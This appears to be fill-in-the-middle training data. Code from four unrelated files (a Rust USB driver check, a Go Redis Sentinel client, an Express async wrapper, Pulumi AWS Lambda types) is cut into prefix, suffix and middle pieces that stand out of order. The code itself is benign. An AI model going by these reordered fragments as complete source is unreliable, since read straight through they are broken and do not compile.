l = i(7), |
kernel_driver.rs | #[cfg(not(target_os = "windows"))]
pub fn is_missing() -> bool {
false
}
#[cfg(target_os = "windows")]
pub fn is_missing() -> bool {
use std::{
ffi::OsStr,
iter::once,
mem::size_of,
os::windows::ffi::OsStrExt,
ptr::{null, null_mut},
};
use winapi::um::setupapi::*;
let flags = DIGCF_ALLCLASSES;
let wide: Vec<u16> = OsStr::new("USB").encode_wide().chain(once(0)).collect();
let dev_info = unsafe { SetupDiGetClassDevsW(null(), wide.as_ptr(), null_mut(), flags) };
let mut dev_info_data = SP_DEVINFO_DATA {
cbSize: size_of::<SP_DEVINFO_DATA>() as u32,
..Default::default()
};
let mut i = 0;
while unsafe { SetupDiEnumDeviceInfo(dev_info, i, &mut dev_info_data) } > 0 {
if unsafe { SetupDiBuildDriverInfoList(dev_info, &mut dev_info_data, SPDIT_COMPATDRIVER) }
> 0
{
let mut j = 0;
loop {
let mut drv_info_data = SP_DRVINFO_DATA_V2_W {
cbSize: std::mem::size_of::<SP_DRVINFO_DATA_V2_W>() as u32,
..Default::default()
};
| dev_info,
&mut dev_info_data,
SPDIT_COMPATDRIVER,
j,
&mut drv_info_data,
)
} == 0
{
break;
}
let mfg = drv_info_data.MfgName;
if String::from_utf16_lossy(&mfg)
.trim_matches(char::from(0))
.contains("Pico Technology Ltd")
{
return false;
}
j += 1;
}
}
i += 1;
}
true
} | if unsafe {
SetupDiEnumDriverInfoW(
|
sentinel.go | // Copyright 2016 CodisLabs. All Rights Reserved.
// Licensed under the MIT (MIT-LICENSE.txt) license.
package redis
import (
"fmt"
"net"
"strconv"
"strings"
"time"
"golang.org/x/net/context"
"github.com/CodisLabs/codis/pkg/utils/errors"
"github.com/CodisLabs/codis/pkg/utils/sync2/atomic2"
redigo "github.com/garyburd/redigo/redis"
)
type Sentinel struct {
context.Context
Cancel context.CancelFunc
Product, Auth string
LogFunc func(format string, args ...interface{})
ErrFunc func(err error, format string, args ...interface{})
}
func NewSentinel(product, auth string) *Sentinel |
func (s *Sentinel) IsCanceled() bool {
select {
case <-s.Context.Done():
return true
default:
return false
}
}
func (s *Sentinel) NodeName(gid int) string {
return fmt.Sprintf("%s-%d", s.Product, gid)
}
func (s *Sentinel) isSameProduct(name string) (gid int, _ bool) {
if !strings.HasPrefix(name, s.Product) {
return 0, false
}
var suffix = name[len(s.Product):]
if len(suffix) <= 1 || suffix[0] != '-' {
return 0, false
}
n, err := strconv.Atoi(suffix[1:])
if err != nil {
return 0, false
}
return n, true
}
func (s *Sentinel) printf(format string, args ...interface{}) {
if s.LogFunc != nil {
s.LogFunc(format, args...)
}
}
func (s *Sentinel) errorf(err error, format string, args ...interface{}) {
if s.ErrFunc != nil {
s.ErrFunc(err, format, args...)
}
}
func (s *Sentinel) do(sentinel string, timeout time.Duration,
fn func(client *Client) error) error {
c, err := NewClientNoAuth(sentinel, timeout)
if err != nil {
return err
}
defer c.Close()
return fn(c)
}
func (s *Sentinel) dispatch(ctx context.Context, sentinel string, timeout time.Duration,
fn func(client *Client) error) error {
c, err := NewClientNoAuth(sentinel, timeout)
if err != nil {
return err
}
defer c.Close()
var exit = make(chan error, 1)
go func() {
exit <- fn(c)
}()
select {
case <-ctx.Done():
return errors.Trace(ctx.Err())
case err := <-exit:
return err
}
}
func (s *Sentinel) subscribeCommand(client *Client, sentinel string,
onSubscribed func()) error {
var channels = []interface{}{"+switch-master"}
if err := client.Flush("SUBSCRIBE", channels...); err != nil {
return errors.Trace(err)
}
for _, sub := range channels {
values, err := redigo.Values(client.Receive())
if err != nil {
return errors.Trace(err)
} else if len(values) != 3 {
return errors.Errorf("invalid response = %v", values)
}
s, err := redigo.Strings(values[:2], nil)
if err != nil || s[0] != "subscribe" || s[1] != sub.(string) {
return errors.Errorf("invalid response = %v", values)
}
}
onSubscribed()
for {
values, err := redigo.Values(client.Receive())
if err != nil {
return errors.Trace(err)
} else if len(values) < 2 {
return errors.Errorf("invalid response = %v", values)
}
message, err := redigo.Strings(values, nil)
if err != nil || message[0] != "message" {
return errors.Errorf("invalid response = %v", values)
}
s.printf("sentinel-[%s] subscribe event %v", sentinel, message)
switch message[1] {
case "+switch-master":
if len(message) != 3 {
return errors.Errorf("invalid response = %v", values)
}
var params = strings.SplitN(message[2], " ", 2)
if len(params) != 2 {
return errors.Errorf("invalid response = %v", values)
}
_, yes := s.isSameProduct(params[0])
if yes {
return nil
}
}
}
}
func (s *Sentinel) subscribeDispatch(ctx context.Context, sentinel string, timeout time.Duration,
onSubscribed func()) (bool, error) {
var err = s.dispatch(ctx, sentinel, timeout, func(c *Client) error {
return s.subscribeCommand(c, sentinel, onSubscribed)
})
if err != nil {
switch errors.Cause(err) {
case context.Canceled, context.DeadlineExceeded:
return false, nil
default:
return false, err
}
}
return true, nil
}
func (s *Sentinel) Subscribe(sentinels []string, timeout time.Duration, onMajoritySubscribed func()) bool {
cntx, cancel := context.WithTimeout(s.Context, timeout)
defer cancel()
timeout += time.Second * 5
results := make(chan bool, len(sentinels))
var majority = 1 + len(sentinels)/2
var subscribed atomic2.Int64
for i := range sentinels {
go func(sentinel string) {
notified, err := s.subscribeDispatch(cntx, sentinel, timeout, func() {
if subscribed.Incr() == int64(majority) {
onMajoritySubscribed()
}
})
if err != nil {
s.errorf(err, "sentinel-[%s] subscribe failed", sentinel)
}
results <- notified
}(sentinels[i])
}
for alive := len(sentinels); ; alive-- {
if alive < majority {
if cntx.Err() == nil {
s.printf("sentinel subscribe lost majority (%d/%d)", alive, len(sentinels))
}
return false
}
select {
case <-cntx.Done():
if cntx.Err() != context.DeadlineExceeded {
s.printf("sentinel subscribe canceled (%v)", cntx.Err())
}
return false
case notified := <-results:
if notified {
s.printf("sentinel subscribe notified +switch-master")
return true
}
}
}
}
func (s *Sentinel) existsCommand(client *Client, name string) (bool, error) {
r, err := client.Do("SENTINEL", "get-master-addr-by-name", name)
if err != nil {
return false, errors.Trace(err)
}
return r != nil, nil
}
func (s *Sentinel) masterCommand(client *Client, name string) (map[string]string, error) {
if exists, err := s.existsCommand(client, name); err != nil {
return nil, err
} else if !exists {
return nil, nil
}
m, err := redigo.StringMap(client.Do("SENTINEL", "master", name))
if err != nil {
return nil, errors.Trace(err)
}
return m, nil
}
func (s *Sentinel) slavesCommand(client *Client, name string) ([]map[string]string, error) {
if exists, err := s.existsCommand(client, name); err != nil {
return nil, err
} else if !exists {
return nil, nil
}
values, err := redigo.Values(client.Do("SENTINEL", "slaves", name))
if err != nil {
return nil, errors.Trace(err)
}
var slaves []map[string]string
for i := range values {
m, err := redigo.StringMap(values[i], nil)
if err != nil {
return nil, errors.Trace(err)
}
slaves = append(slaves, m)
}
return slaves, nil
}
func (s *Sentinel) mastersCommand(client *Client) (map[int]map[string]string, error) {
values, err := redigo.Values(client.Do("SENTINEL", "masters"))
if err != nil {
return nil, errors.Trace(err)
}
var masters = make(map[int]map[string]string)
for i := range values {
m, err := redigo.StringMap(values[i], nil)
if err != nil {
return nil, errors.Trace(err)
}
gid, yes := s.isSameProduct(m["name"])
if yes {
masters[gid] = m
}
}
return masters, nil
}
func (s *Sentinel) mastersDispatch(ctx context.Context, sentinel string, timeout time.Duration) (map[int]*SentinelMaster, error) {
var masters = make(map[int]*SentinelMaster)
var err = s.dispatch(ctx, sentinel, timeout, func(c *Client) error {
m, err := s.mastersCommand(c)
if err != nil {
return err
}
for gid, master := range m {
epoch, err := strconv.ParseInt(master["config-epoch"], 10, 64)
if err != nil {
s.printf("sentinel-[%s] masters parse %s failed, config-epoch = '%s', %s",
sentinel, master["name"], master["config-epoch"], err)
continue
}
var ip, port = master["ip"], master["port"]
if ip == "" || port == "" {
s.printf("sentinel-[%s] masters parse %s failed, ip:port = '%s:%s'",
sentinel, master["name"], ip, port)
continue
}
masters[gid] = &SentinelMaster{
Addr: net.JoinHostPort(ip, port),
Info: master, Epoch: epoch,
}
}
return nil
})
if err != nil {
switch errors.Cause(err) {
case context.Canceled:
return nil, nil
default:
return nil, err
}
}
return masters, nil
}
type SentinelMaster struct {
Addr string
Info map[string]string
Epoch int64
}
func (s *Sentinel) Masters(sentinels []string, timeout time.Duration) (map[int]string, error) {
cntx, cancel := context.WithTimeout(s.Context, timeout)
defer cancel()
timeout += time.Second * 5
results := make(chan map[int]*SentinelMaster, len(sentinels))
var majority = 1 + len(sentinels)/2
for i := range sentinels {
go func(sentinel string) {
masters, err := s.mastersDispatch(cntx, sentinel, timeout)
if err != nil {
s.errorf(err, "sentinel-[%s] masters failed", sentinel)
}
results <- masters
}(sentinels[i])
}
masters := make(map[int]string)
current := make(map[int]*SentinelMaster)
var voted int
for alive := len(sentinels); ; alive-- {
if alive == 0 {
switch {
case cntx.Err() != context.DeadlineExceeded && cntx.Err() != nil:
s.printf("sentinel masters canceled (%v)", cntx.Err())
return nil, errors.Trace(cntx.Err())
case voted != len(sentinels):
s.printf("sentinel masters voted = (%d/%d) masters = %d (%v)", voted, len(sentinels), len(masters), cntx.Err())
}
if voted < majority {
return nil, errors.Errorf("lost majority (%d/%d)", voted, len(sentinels))
}
return masters, nil
}
select {
case <-cntx.Done():
switch {
case cntx.Err() != context.DeadlineExceeded:
s.printf("sentinel masters canceled (%v)", cntx.Err())
return nil, errors.Trace(cntx.Err())
default:
s.printf("sentinel masters voted = (%d/%d) masters = %d (%v)", voted, len(sentinels), len(masters), cntx.Err())
}
if voted < majority {
return nil, errors.Errorf("lost majority (%d/%d)", voted, len(sentinels))
}
return masters, nil
case m := <-results:
if m == nil {
continue
}
for gid, master := range m {
if current[gid] == nil || current[gid].Epoch < master.Epoch {
current[gid] = master
masters[gid] = master.Addr
}
}
voted += 1
}
}
}
type MonitorConfig struct {
Quorum int
ParallelSyncs int
DownAfter time.Duration
FailoverTimeout time.Duration
NotificationScript string
ClientReconfigScript string
}
func (s *Sentinel) monitorGroupsCommand(client *Client, sentniel string, config *MonitorConfig, groups map[int]*net.TCPAddr) error {
for gid, tcpAddr := range groups {
var name = s.NodeName(gid)
if exists, err := s.existsCommand(client, name); err != nil {
return err
} else if exists {
_, err := client.Do("SENTINEL", "remove", name)
if err != nil {
return errors.Trace(err)
}
}
var ip, port = tcpAddr.IP.String(), tcpAddr.Port
_, err := client.Do("SENTINEL", "monitor", name, ip, port, config.Quorum)
if err != nil {
return errors.Trace(err)
} else {
var args = []interface{}{"set", name}
if config.ParallelSyncs != 0 {
args = append(args, "parallel-syncs", config.ParallelSyncs)
}
if config.DownAfter != 0 {
args = append(args, "down-after-milliseconds", int(config.DownAfter/time.Millisecond))
}
if config.FailoverTimeout != 0 {
args = append(args, "failover-timeout", int(config.FailoverTimeout/time.Millisecond))
}
if s.Auth != "" {
args = append(args, "auth-pass", s.Auth)
}
if config.NotificationScript != "" {
args = append(args, "notification-script", config.NotificationScript)
}
if config.ClientReconfigScript != "" {
args = append(args, "client-reconfig-script", config.ClientReconfigScript)
}
_, err := client.Do("SENTINEL", args...)
if err != nil {
return errors.Trace(err)
}
}
}
return nil
}
func (s *Sentinel) monitorGroupsDispatch(ctx context.Context, sentinel string, timeout time.Duration,
config *MonitorConfig, groups map[int]*net.TCPAddr) error {
var err = s.dispatch(ctx, sentinel, timeout, func(c *Client) error {
return s.monitorGroupsCommand(c, sentinel, config, groups)
})
if err != nil {
switch errors.Cause(err) {
case context.Canceled:
return nil
default:
return err
}
}
return nil
}
func (s *Sentinel) MonitorGroups(sentinels []string, timeout time.Duration, config *MonitorConfig, groups map[int]string) error {
cntx, cancel := context.WithTimeout(s.Context, timeout)
defer cancel()
resolve := make(map[int]*net.TCPAddr)
var exit = make(chan error, 1)
go func() (err error) {
defer func() {
exit <- err
}()
for gid, addr := range groups {
if err := cntx.Err(); err != nil {
return errors.Trace(err)
}
tcpAddr, err := net.ResolveTCPAddr("tcp", addr)
if err != nil {
s.printf("sentinel monitor resolve tcp address of %s failed, %s", addr, err)
return errors.Trace(err)
}
resolve[gid] = tcpAddr
}
return nil
}()
select {
case <-cntx.Done():
if cntx.Err() != context.DeadlineExceeded {
s.printf("sentinel monitor canceled (%v)", cntx.Err())
} else {
s.printf("sentinel montior resolve tcp address (%v)", cntx.Err())
}
return errors.Trace(cntx.Err())
case err := <-exit:
if err != nil {
return err
}
}
timeout += time.Second * 5
results := make(chan error, len(sentinels))
for i := range sentinels {
go func(sentinel string) {
err := s.monitorGroupsDispatch(cntx, sentinel, timeout, config, resolve)
if err != nil {
s.errorf(err, "sentinel-[%s] monitor failed", sentinel)
}
results <- err
}(sentinels[i])
}
var last error
for _ = range sentinels {
select {
case <-cntx.Done():
if last != nil {
return last
}
return errors.Trace(cntx.Err())
case err := <-results:
if err != nil {
last = err
}
}
}
return last
}
func (s *Sentinel) removeGroupsCommand(client *Client, groups map[int]bool) error {
for gid := range groups {
var name = s.NodeName(gid)
if exists, err := s.existsCommand(client, name); err != nil {
return err
} else if exists {
_, err := client.Do("SENTINEL", "remove", name)
if err != nil {
return errors.Trace(err)
}
}
}
return nil
}
func (s *Sentinel) removeGroupsDispatch(ctx context.Context, sentinel string, timeout time.Duration,
groups map[int]bool) error {
var err = s.dispatch(ctx, sentinel, timeout, func(c *Client) error {
return s.removeGroupsCommand(c, groups)
})
if err != nil {
switch errors.Cause(err) {
case context.Canceled:
return nil
default:
return err
}
}
return nil
}
func (s *Sentinel) RemoveGroups(sentinels []string, timeout time.Duration, groups map[int]bool) error {
cntx, cancel := context.WithTimeout(s.Context, timeout)
defer cancel()
timeout += time.Second * 5
results := make(chan error, len(sentinels))
for i := range sentinels {
go func(sentinel string) {
err := s.removeGroupsDispatch(cntx, sentinel, timeout, groups)
if err != nil {
s.errorf(err, "sentinel-[%s] remove failed", sentinel)
}
results <- err
}(sentinels[i])
}
var last error
for _ = range sentinels {
select {
case <-cntx.Done():
if last != nil {
return last
}
return errors.Trace(cntx.Err())
case err := <-results:
if err != nil {
last = err
}
}
}
return last
}
func (s *Sentinel) removeGroupsAllDispatch(ctx context.Context, sentinel string, timeout time.Duration) error {
var err = s.dispatch(ctx, sentinel, timeout, func(c *Client) error {
m, err := s.mastersCommand(c)
if err != nil {
return err
}
var groups = make(map[int]bool)
for gid := range m {
groups[gid] = true
}
return s.removeGroupsCommand(c, groups)
})
if err != nil {
switch errors.Cause(err) {
case context.Canceled:
return nil
default:
return err
}
}
return nil
}
func (s *Sentinel) RemoveGroupsAll(sentinels []string, timeout time.Duration) error {
cntx, cancel := context.WithTimeout(s.Context, timeout)
defer cancel()
timeout += time.Second * 5
results := make(chan error, len(sentinels))
for i := range sentinels {
go func(sentinel string) {
err := s.removeGroupsAllDispatch(cntx, sentinel, timeout)
if err != nil {
s.errorf(err, "sentinel-[%s] remove failed", sentinel)
}
results <- err
}(sentinels[i])
}
var last error
for _ = range sentinels {
select {
case <-cntx.Done():
if last != nil {
return last
}
return errors.Trace(cntx.Err())
case err := <-results:
if err != nil {
last = err
}
}
}
return last
}
type SentinelGroup struct {
Master map[string]string `json:"master"`
Slaves []map[string]string `json:"slaves,omitempty"`
}
func (s *Sentinel) MastersAndSlavesClient(client *Client) (map[string]*SentinelGroup, error) {
masters, err := s.mastersCommand(client)
if err != nil {
return nil, err
}
results := make(map[string]*SentinelGroup)
for _, master := range masters {
var name = master["name"]
slaves, err := s.slavesCommand(client, name)
if err != nil {
return nil, err
}
results[name] = &SentinelGroup{
Master: master, Slaves: slaves,
}
}
return results, nil
}
func (s *Sentinel) MastersAndSlaves(sentinel string, timeout time.Duration) (map[string]*SentinelGroup, error) {
var results map[string]*SentinelGroup
var err = s.do(sentinel, timeout, func(c *Client) error {
m, err := s.MastersAndSlavesClient(c)
if err != nil {
return err
}
results = m
return nil
})
if err != nil {
return nil, err
}
return results, nil
}
func (s *Sentinel) FlushConfig(sentinel string, timeout time.Duration) error {
return s.do(sentinel, timeout, func(c *Client) error {
_, err := c.Do("SENTINEL", "flushconfig")
if err != nil {
return err
}
return nil
})
}
| {
s := &Sentinel{Product: product, Auth: auth}
s.Context, s.Cancel = context.WithCancel(context.Background())
return s
} |
asyncController.js | const asyncController = (controllerPromise, options = {}) => { | return (req, res, next) => {
if (options.json) {
req.setjsonerror = true;
}
controllerPromise(req, res, next).catch(e => next(e));
};
};
module.exports = {
asyncController
}; | |
outputs.py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from .. import _utilities, _tables
from . import outputs
from ._enums import *
__all__ = [
'AliasRoutingConfig',
'CodeSigningConfigAllowedPublishers',
'CodeSigningConfigPolicies',
'EventSourceMappingDestinationConfig',
'EventSourceMappingDestinationConfigOnFailure',
'FunctionDeadLetterConfig',
'FunctionEnvironment',
'FunctionEventInvokeConfigDestinationConfig',
'FunctionEventInvokeConfigDestinationConfigOnFailure',
'FunctionEventInvokeConfigDestinationConfigOnSuccess',
'FunctionFileSystemConfig',
'FunctionImageConfig',
'FunctionTracingConfig',
'FunctionVpcConfig',
'GetCodeSigningConfigAllowedPublisherResult',
'GetCodeSigningConfigPolicyResult',
'GetFunctionDeadLetterConfigResult',
'GetFunctionEnvironmentResult',
'GetFunctionFileSystemConfigResult',
'GetFunctionTracingConfigResult',
'GetFunctionVpcConfigResult',
]
@pulumi.output_type
class AliasRoutingConfig(dict):
def __init__(__self__, *,
additional_version_weights: Optional[Mapping[str, float]] = None):
"""
:param Mapping[str, float] additional_version_weights: A map that defines the proportion of events that should be sent to different versions of a lambda function.
"""
if additional_version_weights is not None:
pulumi.set(__self__, "additional_version_weights", additional_version_weights)
@property
@pulumi.getter(name="additionalVersionWeights")
def additional_version_weights(self) -> Optional[Mapping[str, float]]:
"""
A map that defines the proportion of events that should be sent to different versions of a lambda function.
"""
return pulumi.get(self, "additional_version_weights")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class CodeSigningConfigAllowedPublishers(dict):
def __init__(__self__, *,
signing_profile_version_arns: Sequence[str]):
"""
:param Sequence[str] signing_profile_version_arns: The Amazon Resource Name (ARN) for each of the signing profiles. A signing profile defines a trusted user who can sign a code package.
"""
pulumi.set(__self__, "signing_profile_version_arns", signing_profile_version_arns)
@property
@pulumi.getter(name="signingProfileVersionArns")
def signing_profile_version_arns(self) -> Sequence[str]:
"""
The Amazon Resource Name (ARN) for each of the signing profiles. A signing profile defines a trusted user who can sign a code package.
"""
return pulumi.get(self, "signing_profile_version_arns")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class CodeSigningConfigPolicies(dict):
def __init__(__self__, *,
untrusted_artifact_on_deployment: str):
"""
:param str untrusted_artifact_on_deployment: Code signing configuration policy for deployment validation failure. If you set the policy to Enforce, Lambda blocks the deployment request if code-signing validation checks fail. If you set the policy to Warn, Lambda allows the deployment and creates a CloudWatch log. Valid values: `Warn`, `Enforce`. Default value: `Warn`.
"""
pulumi.set(__self__, "untrusted_artifact_on_deployment", untrusted_artifact_on_deployment)
@property
@pulumi.getter(name="untrustedArtifactOnDeployment")
def untrusted_artifact_on_deployment(self) -> str:
"""
Code signing configuration policy for deployment validation failure. If you set the policy to Enforce, Lambda blocks the deployment request if code-signing validation checks fail. If you set the policy to Warn, Lambda allows the deployment and creates a CloudWatch log. Valid values: `Warn`, `Enforce`. Default value: `Warn`.
"""
return pulumi.get(self, "untrusted_artifact_on_deployment")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class EventSourceMappingDestinationConfig(dict):
def __init__(__self__, *,
on_failure: Optional['outputs.EventSourceMappingDestinationConfigOnFailure'] = None):
"""
:param 'EventSourceMappingDestinationConfigOnFailureArgs' on_failure: The destination configuration for failed invocations. Detailed below.
"""
if on_failure is not None:
pulumi.set(__self__, "on_failure", on_failure)
@property
@pulumi.getter(name="onFailure")
def on_failure(self) -> Optional['outputs.EventSourceMappingDestinationConfigOnFailure']:
"""
The destination configuration for failed invocations. Detailed below.
"""
return pulumi.get(self, "on_failure")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class EventSourceMappingDestinationConfigOnFailure(dict):
def __init__(__self__, *,
destination_arn: str):
"""
:param str destination_arn: The Amazon Resource Name (ARN) of the destination resource.
"""
pulumi.set(__self__, "destination_arn", destination_arn)
@property
@pulumi.getter(name="destinationArn")
def destination_arn(self) -> str:
"""
The Amazon Resource Name (ARN) of the destination resource.
"""
return pulumi.get(self, "destination_arn")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class FunctionDeadLetterConfig(dict):
def __init__(__self__, *,
target_arn: str):
"""
:param str target_arn: ARN of an SNS topic or SQS queue to notify when an invocation fails. If this option is used, the function's IAM role must be granted suitable access to write to the target object, which means allowing either the `sns:Publish` or `sqs:SendMessage` action on this ARN, depending on which service is targeted.
"""
pulumi.set(__self__, "target_arn", target_arn)
@property
@pulumi.getter(name="targetArn")
def target_arn(self) -> str:
"""
ARN of an SNS topic or SQS queue to notify when an invocation fails. If this option is used, the function's IAM role must be granted suitable access to write to the target object, which means allowing either the `sns:Publish` or `sqs:SendMessage` action on this ARN, depending on which service is targeted.
"""
return pulumi.get(self, "target_arn")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class FunctionEnvironment(dict):
def __init__(__self__, *,
variables: Optional[Mapping[str, str]] = None):
"""
:param Mapping[str, str] variables: Map of environment variables that are accessible from the function code during execution.
"""
if variables is not None:
pulumi.set(__self__, "variables", variables)
@property
@pulumi.getter
def variables(self) -> Optional[Mapping[str, str]]:
"""
Map of environment variables that are accessible from the function code during execution.
"""
return pulumi.get(self, "variables")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class FunctionEventInvokeConfigDestinationConfig(dict):
def __init__(__self__, *,
on_failure: Optional['outputs.FunctionEventInvokeConfigDestinationConfigOnFailure'] = None,
on_success: Optional['outputs.FunctionEventInvokeConfigDestinationConfigOnSuccess'] = None):
"""
:param 'FunctionEventInvokeConfigDestinationConfigOnFailureArgs' on_failure: Configuration block with destination configuration for failed asynchronous invocations. See below for details.
:param 'FunctionEventInvokeConfigDestinationConfigOnSuccessArgs' on_success: Configuration block with destination configuration for successful asynchronous invocations. See below for details.
"""
if on_failure is not None:
pulumi.set(__self__, "on_failure", on_failure)
if on_success is not None:
pulumi.set(__self__, "on_success", on_success)
@property
@pulumi.getter(name="onFailure")
def on_failure(self) -> Optional['outputs.FunctionEventInvokeConfigDestinationConfigOnFailure']:
"""
Configuration block with destination configuration for failed asynchronous invocations. See below for details.
"""
return pulumi.get(self, "on_failure")
@property
@pulumi.getter(name="onSuccess")
def on_success(self) -> Optional['outputs.FunctionEventInvokeConfigDestinationConfigOnSuccess']:
"""
Configuration block with destination configuration for successful asynchronous invocations. See below for details.
"""
return pulumi.get(self, "on_success")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class FunctionEventInvokeConfigDestinationConfigOnFailure(dict):
def __init__(__self__, *,
destination: str):
"""
:param str destination: Amazon Resource Name (ARN) of the destination resource. See the [Lambda Developer Guide](https://docs.aws.amazon.com/lambda/latest/dg/invocation-async.html#invocation-async-destinations) for acceptable resource types and associated IAM permissions.
"""
pulumi.set(__self__, "destination", destination)
@property
@pulumi.getter
def destination(self) -> str:
"""
Amazon Resource Name (ARN) of the destination resource. See the [Lambda Developer Guide](https://docs.aws.amazon.com/lambda/latest/dg/invocation-async.html#invocation-async-destinations) for acceptable resource types and associated IAM permissions.
"""
return pulumi.get(self, "destination")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class FunctionEventInvokeConfigDestinationConfigOnSuccess(dict):
def __init__(__self__, *,
destination: str):
"""
:param str destination: Amazon Resource Name (ARN) of the destination resource. See the [Lambda Developer Guide](https://docs.aws.amazon.com/lambda/latest/dg/invocation-async.html#invocation-async-destinations) for acceptable resource types and associated IAM permissions.
"""
pulumi.set(__self__, "destination", destination)
@property
@pulumi.getter
def destination(self) -> str:
"""
Amazon Resource Name (ARN) of the destination resource. See the [Lambda Developer Guide](https://docs.aws.amazon.com/lambda/latest/dg/invocation-async.html#invocation-async-destinations) for acceptable resource types and associated IAM permissions.
"""
return pulumi.get(self, "destination")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class FunctionFileSystemConfig(dict):
def __init__(__self__, *,
arn: str,
local_mount_path: str):
"""
:param str arn: Amazon Resource Name (ARN) of the Amazon EFS Access Point that provides access to the file system.
:param str local_mount_path: Path where the function can access the file system, starting with /mnt/.
"""
pulumi.set(__self__, "arn", arn)
pulumi.set(__self__, "local_mount_path", local_mount_path)
@property
@pulumi.getter
def arn(self) -> str:
"""
Amazon Resource Name (ARN) of the Amazon EFS Access Point that provides access to the file system.
"""
return pulumi.get(self, "arn")
@property
@pulumi.getter(name="localMountPath")
def local_mount_path(self) -> str:
"""
Path where the function can access the file system, starting with /mnt/.
"""
return pulumi.get(self, "local_mount_path")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class FunctionImageConfig(dict):
def __init__(__self__, *,
commands: Optional[Sequence[str]] = None,
entry_points: Optional[Sequence[str]] = None,
working_directory: Optional[str] = None):
"""
:param Sequence[str] commands: Parameters that you want to pass in with `entry_point`.
:param Sequence[str] entry_points: Entry point to your application, which is typically the location of the runtime executable.
:param str working_directory: Working directory.
"""
if commands is not None:
pulumi.set(__self__, "commands", commands)
if entry_points is not None:
pulumi.set(__self__, "entry_points", entry_points)
if working_directory is not None:
pulumi.set(__self__, "working_directory", working_directory)
@property
@pulumi.getter
def commands(self) -> Optional[Sequence[str]]:
"""
Parameters that you want to pass in with `entry_point`.
"""
return pulumi.get(self, "commands")
@property
@pulumi.getter(name="entryPoints")
def entry_points(self) -> Optional[Sequence[str]]:
"""
Entry point to your application, which is typically the location of the runtime executable.
"""
return pulumi.get(self, "entry_points")
@property
@pulumi.getter(name="workingDirectory")
def working_directory(self) -> Optional[str]:
"""
Working directory.
"""
return pulumi.get(self, "working_directory")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class FunctionTracingConfig(dict):
def __init__(__self__, *,
mode: str):
"""
:param str mode: Whether to to sample and trace a subset of incoming requests with AWS X-Ray. Valid values are `PassThrough` and `Active`. If `PassThrough`, Lambda will only trace the request from an upstream service if it contains a tracing header with "sampled=1". If `Active`, Lambda will respect any tracing header it receives from an upstream service. If no tracing header is received, Lambda will call X-Ray for a tracing decision.
"""
pulumi.set(__self__, "mode", mode)
@property
@pulumi.getter
def mode(self) -> str:
"""
Whether to to sample and trace a subset of incoming requests with AWS X-Ray. Valid values are `PassThrough` and `Active`. If `PassThrough`, Lambda will only trace the request from an upstream service if it contains a tracing header with "sampled=1". If `Active`, Lambda will respect any tracing header it receives from an upstream service. If no tracing header is received, Lambda will call X-Ray for a tracing decision.
"""
return pulumi.get(self, "mode")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class FunctionVpcConfig(dict):
def __init__(__self__, *,
security_group_ids: Sequence[str],
subnet_ids: Sequence[str],
vpc_id: Optional[str] = None):
"""
:param Sequence[str] security_group_ids: List of security group IDs associated with the Lambda function.
:param Sequence[str] subnet_ids: List of subnet IDs associated with the Lambda function.
"""
pulumi.set(__self__, "security_group_ids", security_group_ids)
pulumi.set(__self__, "subnet_ids", subnet_ids)
if vpc_id is not None:
pulumi.set(__self__, "vpc_id", vpc_id)
@property
@pulumi.getter(name="securityGroupIds")
def security_group_ids(self) -> Sequence[str]:
"""
List of security group IDs associated with the Lambda function.
"""
return pulumi.get(self, "security_group_ids")
@property
@pulumi.getter(name="subnetIds")
def subnet_ids(self) -> Sequence[str]:
"""
List of subnet IDs associated with the Lambda function.
"""
return pulumi.get(self, "subnet_ids")
@property
@pulumi.getter(name="vpcId")
def vpc_id(self) -> Optional[str]:
return pulumi.get(self, "vpc_id")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class GetCodeSigningConfigAllowedPublisherResult(dict):
def __init__(__self__, *,
signing_profile_version_arns: Sequence[str]):
"""
:param Sequence[str] signing_profile_version_arns: The Amazon Resource Name (ARN) for each of the signing profiles. A signing profile defines a trusted user who can sign a code package.
"""
pulumi.set(__self__, "signing_profile_version_arns", signing_profile_version_arns)
@property
@pulumi.getter(name="signingProfileVersionArns")
def signing_profile_version_arns(self) -> Sequence[str]:
"""
The Amazon Resource Name (ARN) for each of the signing profiles. A signing profile defines a trusted user who can sign a code package.
"""
return pulumi.get(self, "signing_profile_version_arns")
@pulumi.output_type
class GetCodeSigningConfigPolicyResult(dict):
def __init__(__self__, *,
untrusted_artifact_on_deployment: str):
"""
:param str untrusted_artifact_on_deployment: Code signing configuration policy for deployment validation failure.
"""
pulumi.set(__self__, "untrusted_artifact_on_deployment", untrusted_artifact_on_deployment)
@property
@pulumi.getter(name="untrustedArtifactOnDeployment")
def untrusted_artifact_on_deployment(self) -> str:
"""
Code signing configuration policy for deployment validation failure.
""" |
@pulumi.output_type
